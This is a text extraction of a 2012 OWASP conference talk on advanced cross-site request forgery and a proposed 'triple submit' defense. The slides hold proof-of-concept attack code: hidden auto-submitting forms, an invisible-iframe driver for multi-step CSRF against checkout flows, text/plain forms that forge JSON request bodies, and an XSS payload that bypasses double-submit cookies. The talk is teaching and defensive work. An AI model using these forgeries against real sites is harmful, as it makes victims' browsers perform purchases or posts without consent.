Advanced CSRF and Stateless at OWASP AppSec Research 2012

Size: px

Start display at page:

Download "Advanced CSRF and Stateless at OWASP AppSec Research 2012"

Pamela Sanders
6 years ago
Views:

1 Advanced CSRF and Stateless at OWASP AppSec Research 2012

2 Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP johnwilander.com (music) johnwilander.se (papers etc)

3 Some Quick CSRF Basics

4 Cross-Site Request Forgery Request Forgery Cross-Site

5 Cross-Site Request Forgery Request Forgery Cross-Site Phishing

6 What s on your mind? POST What s on your mind? POST

7 What s on your mind? I love OWASP! POST What s on your mind? POST

8 What s on your mind? I love OWASP! POST What s on your mind? POST John: I love OWASP!

9 What s on your mind? POST What s on your mind? POST

10 What s on your mind? POST What s on your mind? I hate OWASP! POST

11 What s on your mind? POST What s on your mind? I hate OWASP! POST

12 What s on your mind? John: I hate OWASP! POST What s on your mind? I hate OWASP! POST

13 What s on your mind? John: I hate OWASP! POST What s on your mind? <form id="target" method="post" action=" <input type="text" value="i hate OWASP!" name="oneliner"/> <input type="submit" value="post"/> </form> <script type="text/javascript"> $(document).ready(function() { $('#form').submit(); }); </script>

14 What s on your mind? John: I hate OWASP! <form id="target" method="post" action=" <input type="text" value="i hate OWASP!" name="oneliner"/> <input type="submit" value="post"/> </form> POST What s on your mind? <script> $(document).ready(function() { $('#target').submit(); }); </script>

15 Multi-Step, Semi-Blind CSRF

16 What about several steps? Step 1 Step 2 Step 3 State built up i steps, server roundtrip in-between

17 Step 1 Step 2 Step 3 Forged request to last step will miss the previous

18 Can we forge timed GETs and POSTs in a deterministic, non-blind way? Step 1 Step 2 Step

19 csrfmultidriver.html invisible iframe csrfmulti0.html

20 csrfmultidriver.html invisible iframe target0.html invisible iframe csrfmulti1.html Wait

21 csrfmultidriver.html invisible iframe invisible iframe invisible iframe target0.html target1.html csrfmulti2.html Wait

22 csrfmultidriver.html invisible iframe invisible iframe invisible iframe invisible iframe target0.html target1.html target2.html csrfmulti3.html Wait

23 csrfmultidriver.html invisible iframe invisible iframe invisible iframe invisible iframe target0.html target1.html target2.html target3.html

24 Let's look at An iframed CSRF Get

25 Invisible iframe for timed GET <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "0", GET_SRC = " </script> <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht

26 The iframed page configures which URL to CSRF against via a JavaScript- <!DOCTYPE html> <html> variable. <head> <script> var IFRAME_ID = "0", GET_SRC = " </script> <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht

27 <!DOCTYPE html> <html> <head> <script> When var IFRAME_ID the iframe's = "0", GET_SRC DOM = is done " </script> loading IFRAME_GETTER.onload() is <script called. src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht

28 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "0", GET_SRC = Let's look at " </script> iframegetter.js <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht

29 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); imgelement.setattribute("width", "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js

30 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); IFRAME_GETTER.onload() imgelement.setattribute("width", makes "0"); sure that imgelement.setattribute("onerror", the iframe reports back to the "javascript:clearinterval(iframe_getter.intervalid)"); main document.body.appendchild(imgelement); page once every second. IFRAME_GETTER.haveGotten = true; A so called heart beat function. } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js

31 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { In practice, the heart beats are imgelement = document.createelement("img"); delivered imgelement.setattribute("src", via postmessage GET_SRC); between imgelement.setattribute("height", "0"); the imgelement.setattribute("width", iframe and the main page. "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js

32 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { The parent.postmessage(iframe_id, GET CSRF is executed with an " <img src="vulnerable URL"> } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); imgelement.setattribute("width", "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js

33 The onerror event will fire var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten since the vulnerable = false; URL does IFRAME_GETTER.reportAndGet = function() { var imgelement; not respond with an image. We if(parent!= undefined) { use that event to stop the parent.postmessage(iframe_id, heart beat function. " No heart } if(!iframe_getter.havegotten) beat means the main { page imgelement knows = this document.createelement("img"); step is done and imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", can continue opening the "0"); next imgelement.setattribute("width", iframe. "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js

34 Let's look at An iframed CSRF Post

35 <!DOCTYPE html> <html> <head> POST <script> var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> <body onload="iframe_poster.onload()"> Invisible iframe for timed <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht

36 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "1"; </script> <script The src="../iframeposter.js"></script> vulnerable URL can be </head> found in the form to be <body onload="iframe_poster.onload()"> posted. <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht

37 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> called. <body onload="iframe_poster.onload()"> When the iframe's DOM is done loading IFRAME_POSTER.onload() is <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht

38 <!DOCTYPE html> <html> <head> <script> Let's look at iframeposter.js var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> <body onload="iframe_poster.onload()"> <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht

39 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_poster.haveposted) { document.forms['target'].submit(); IFRAME_POSTER.havePosted = true; } }; IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter

40 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_poster.haveposted) IFRAME_POSTER.onload() { makes sure the document.forms['target'].submit(); iframe reports back to the main IFRAME_POSTER.havePosted = true; } page once every second. Again, a }; heart beat function. IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter

41 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } The heart beats stop automatically if(!iframe_poster.haveposted) when the POST is done since { the document.forms['target'].submit(); iframe IFRAME_POSTER.havePosted is loaded with the = true; response } from the web server that got the }; POST. IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter

42 The main page configures the order of the CSRF steps, opens iframes and var CSRF = function(){ var hideiframes = true, frames = [ {id: 0, hasposted: "no", hasopenediframe: false, src: 'csrfmulti0.html'},{id: 1, hasposted: "no", hasopenediframe: false, src: 'csrfmulti1.html'} ], appendiframe = function(frame) { var domnode = '<iframe src="' + frame.src + '" height="600" width="400"' + (hideiframes? 'style="visibility: hidden"' : '') + '></iframe>'; $("body").append(domnode); }; csrfmultidriver.ht

43 return { checkiframes : function() { var frame; for (var i = 0; i < frames.length; i++) { frame = frames[i]; if (!frame.hasopenediframe) { iframe appendiframe(frame); frame.hasopenediframe = true; break; // Only open one iframe at the time } else if(frame.hasposted == "no") { frame.hasposted = "maybe"; break; // iframe not done posting, wait } else if(frame.hasposted == "maybe") { frame.hasposted = "yes"; break; // iframe not done posting, wait } else if (frame.hasposted == "yes") { continue; // Time to allow for the next iframe to open } }, } listens on heart beats to time every receivemessage : function(event) { if (event.origin == " { CSRF.frames[parseInt(event.data)].hasPosted = "no"; // Still on CSRF page so POST not done yet } } csrfmultidriver.ht

44 Demo Multi-Step, Semi-Blind CSRF against amazon.com which has protection against this. The intention is to show how you can test your own sites.

45 There used to be a protection in web 1.5

46 Forced Browsing wizard-style Shipment info Payment info $ Next Buy!

47 Forced Browsing wizard-style Shipment info Payment info $ Token Next Buy!

48 Forced Browsing wizard-style Shipment info Payment info $ Re-Auth Next Buy!

49 Forced Browsing wizard-style Token 1 Token 2 Token 3

50 Forced Browsing wizard-style Token 1 Token 2 Token 3 State built up i steps, server roundtrip in-between

51 Forced Browsing wizard-style Token 1 Token 2 Token 3 Couldn t forge request to last step without a valid token

52 But in RIAs...

53 RIA & client-side state { purchase : {} }

54 RIA & client-side state { purchase : { items : [{}] } }

55 RIA & client-side state { purchase : { items : [{},{}] } }

56 RIA & client-side state { purchase : { items : [{},{}], shipment : {} } }

57 RIA & client-side state { purchase : { items : [{},{}], shipment : {}, payment : {} } }

58 RIA & client-side state { purchase : { items : [{},{}], shipment : {}, payment : {} } }

59 Can an attacker forge such a JSON structure?

60 CSRF Against RESTful Services

61 CSRF possible? { purchase : { items : [{},{}], shipment : {}, payment : {} } }

62 <form id="target" method="post" action=" 8444/ws/oneliners"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>

63 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>

64 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>

<form id="target" method="post" action="https://vulnerable.1-liner.

65 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> Forms produce a request body that looks like this: <input type="text" name= value="" /> thename=thevalue... and that s not valid JSON. <input type="submit" value="go" /> </form>

66 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name='{"id": 0, "nickname": "John", "oneliner": "I hate OWASP!", "timestamp": " "}//' value="dummy" /> <input type="submit" value="go" /> </form>

67 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" Produces a request body that looks enctype="text/plain"> like this: <input type="text" {"id": 0, "nickname": name='{"id": "John","oneLiner": 0, "nickname": "John", "I "oneliner": hate OWASP!","timestamp": "I hate "timestamp": " "}//=dummy " "}//' value="dummy" />... and that is acceptable JSON! <input type="submit" value="go" /> </form>

68 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name='{"id": 0, "nickname": "John", "oneliner": "I hate OWASP!", "timestamp": " ", "paddingdummy": "' value='"}' /> <input type="submit" value="go" />

69 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" Produces a request body that looks enctype="text/plain"> like this: <input type="text" {"id": 0, "nickname": name='{"id": "John","oneLiner": 0, "nickname": "John", "I "oneliner": hate OWASP!","timestamp": "I hate "timestamp": " ", " ", "paddingdummy": "' "="} value='"}' />... and that is JSON! <input type="submit" value="go" />

70 Demo CSRF POST then Demo CSRF + XSS The Browser Exploitation Framework

71 Important in your REST API Restrict HTTP method, e.g. POST Easier to do CSRF with GET Restrict to AJAX if applicable X-Requested-With:XMLHttpRequest Cross-domain AJAX prohibited by default Restrict media type(s), e.g. application/json HTML forms only allow URL encoded, multipart and text/plain

72 Double Submit (CSRF Protection)

73 Double Submit (CSRF protection) Anti-CSRF value as cookie and request parameter

74 Double Submit (CSRF protection) cookie request parameter Cannot read the anti-csrf cookie to include it as parameter

75 Double Submit (CSRF protection) Anti-CSRF cookie can be generated client-side => no server-side state

76 Demo Double Submit

77 Are We Fully Protected Now?

78 Are We Fully Protected Now? Of course not

79 The Other Subdomain Search Buy!

80 The Other Subdomain <script>alert('xss')</script> Search XSS OK Buy!

81 The Other Subdomain Buy! <script> $.cookie( "doublesubmittoken", "knownvalue", { path: "/", domain: ".1-liner.org" }); </script> Search

82 Demo Subdomain XSS Double Submit Bypass

83 I'm proposing some sort of Triple Submit CSRF Protection

84 Triple Submit (CSRF protection) Initial request of rich internet app

85 Triple Submit (CSRF protection) Random HttpOnly cookie Cookie value as JavaScript variable

86 Triple Submit (CSRF protection) Random HttpOnly cookie Cookie value as request parameter Stateful: Cookie name saved in server session Stateless: Server only accepts one such cookie (checks format)

87 The 3rd Submit The server sets an HttpOnly cookie with a random name and random value The server tells the client the value of the random cookie, not the name The client submits the value of the cookie as a request parameter

88 The 3rd Submit The server sets an httponly cookie esponse.setheader("set-cookie", randomname with a + random "=" + randomvalue name and random + "; HttpOnly; valuepath='/'; domain=.1-liner.org"); The server tells the client the name and value of the random cookie The Client submits the name and value of the cookie as a request parameter

89 The 3rd Submit The server sets an httponly cookie with a random name and random value script> ar ANTI_CSRF_TRIPLE The server tells the = <%= client randomvalue the name %>; /script> and value of the random cookie The Client submits the name and value of the cookie as a request parameter

90 The 3rd Submit Cookie value as parameter The cookie name The cookie value

91 My Demo System is Being Released as an OWASP title=owasp_1-liner owasp-1-liner

OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10

OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10 Top 10 from a developer s perspective John Wilander, /Omegapoint, IBWAS 10 John Wilander consultant at Omegapoint in Sweden Researcher in application security Co-leader Sweden Certified Java Programmer